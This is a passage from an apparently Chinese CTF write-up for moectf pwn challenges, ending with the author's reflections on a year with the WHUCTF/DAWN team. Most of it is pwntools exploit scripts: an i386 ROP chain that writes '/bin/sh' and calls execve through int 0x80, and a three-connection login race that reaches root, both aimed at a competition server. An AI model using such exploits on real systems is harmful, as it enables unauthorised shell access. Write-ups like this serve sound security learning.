0x23 syscall 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 from pwn import *context(os='linux' , arch='i386' , log_level='debug' ) filename = "pwn" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/i386/libc6_2.35-0ubuntu3.10_i386/lib/i386-linux-gnu/libc.so.6" host = "39.106.48.123" port = 42840 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b func ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() pop_eax_ret = 0x080b438a pop_ebx_ret = 0x08049022 pop_ecx_ret = 0x0804985a pop_edx_ret = 0x0804985c magic = 0x080507cf syscall = 0x0806475d int_80 = 0x08049c0a rw = 0x80ed000 payload = b'a' *(0x12 +4 ) + p32(pop_edx_ret) + p32(rw - 0x28 ) + p32(pop_ecx_ret) + b'/bin' + p32(magic) +\ p32(pop_edx_ret) + p32(rw - 0x28 + 4 ) + p32(pop_ecx_ret) + b'/sh\x00' + p32(magic) +\ p32(pop_eax_ret) + p32(0xb ) + p32(pop_ebx_ret) + p32(rw) + p32(pop_ecx_ret) + p32(0 ) + p32(pop_edx_ret) + p32(0 ) + p32(int_80) log.info("len --> " +hex (len (payload))) io.recvuntil(b'guys' ) io.send(payload.ljust(100 , b'\x00' )) io.interactive()
0x24 小明的问题 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "39.106.48.123" port = 38828 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io1 = start() io2 = start() io3 = start() io1.recvuntil(b'Please select your operation:' ) io1.sendline(b'1' ) io1.recvuntil(b'username:' ) io1.sendline(b'r3t2' ) io1.recvuntil(b'password' ) io1.sendline(b'123' ) io1.recvuntil(b'Please select your operation:' ) io1.sendline(b'2' ) io1.recvuntil(b'username:' ) io1.sendline(b'r3t2' ) io1.recvuntil(b'password' ) io1.sendline(b'123' ) io2.recvuntil(b'Please select your operation:' ) io2.sendline(b'2' ) io2.recvuntil(b'username:' ) io2.sendline(b'r3t2' ) io2.recvuntil(b'password' ) io2.sendline(b'123' ) io2.recvuntil(b'Please select your operation:' ) io1.recvuntil(b'Please select your operation:' ) io1.sendline(b'3' ) io2.sendline(b'3' ) io1.recvuntil(b'username:' ) io2.recvuntil(b'username:' ) io2.sendline(b'r3t2' ) io1.sendline(b'r3t2' ) io1.recvuntil(b'password' ) io2.recvuntil(b'password' ) io1.sendline(b'123' ) io2.sendline(b'123' ) io3.recvuntil(b'Please select your operation:' ) io3.sendline(b'1' ) io3.recvuntil(b'username:' ) io3.sendline(b'root' ) io3.recvuntil(b'password' ) io3.sendline(b'123' ) io3.interactive()
0xff
原来已经一年了,moectf也算是见证了笔者这一年的变化,看到平台还留存着自己的参赛记录 学校的新生赛也刚刚结束,25级的新师傅们很有天赋和潜力,回想起自己去年新生赛的时候什么都不会,却也坚持每天到线下,也算勤能补拙吧哈哈 本人笔拙,写不出富含情感的文字,许多感受也写不太出来,最后就祝WHUCTF/DAWN越来越来好,祝看到最后的师傅们天天向上! 以上